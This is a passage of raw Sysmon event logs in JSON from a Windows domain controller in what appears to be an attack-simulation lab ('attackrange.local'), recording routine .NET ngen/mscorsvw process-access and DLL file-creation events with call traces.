(rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.732","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010BD9C1100}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.732\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010BD9C1100}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.732","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010BD9C1100}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.732\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010BD9C1100}\r\nTargetProcessId: 4992\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.732","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010BD9C1100}","TargetProcessId":"4992","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.763\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 4104\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010C69F1100}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.763","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"4104","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010C69F1100}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.763\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010C69F1100}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.763","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010C69F1100}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.779\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-0010C69F1100}\r\nTargetProcessId: 4280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.779","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-0010C69F1100}","TargetProcessId":"4280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":9089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:03:32.810\r\nProcessGuid: {E2A3D6B1-13C4-5F25-0000-0010C69F1100}\r\nProcessId: 4280\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\10b8-0\\Accessibility.dll\r\nCreationUtcTime: 2020-08-01 07:03:32.810","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:03:32.810","ProcessGuid":"{E2A3D6B1-13C4-5F25-0000-0010C69F1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\10b8-0\\Accessibility.dll","CreationUtcTime":"2020-08-01 07:03:32.810","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.841\r\nSourceProcessGUID: {E2A3D6B1-12B6-5F25-0000-0010A1A50900}\r\nSourceProcessId: 2312\r\nSourceThreadId: 876\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001010A31100}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.841","SourceProcessGUID":"{E2A3D6B1-12B6-5F25-0000-0010A1A50900}","SourceProcessId":"2312","SourceThreadId":"876","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001010A31100}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:32","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:32.841\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-13C4-5F25-0000-001010A31100}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:32.841","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-13C4-5F25-0000-001010A31100}","TargetProcessId":"4800","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:03:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
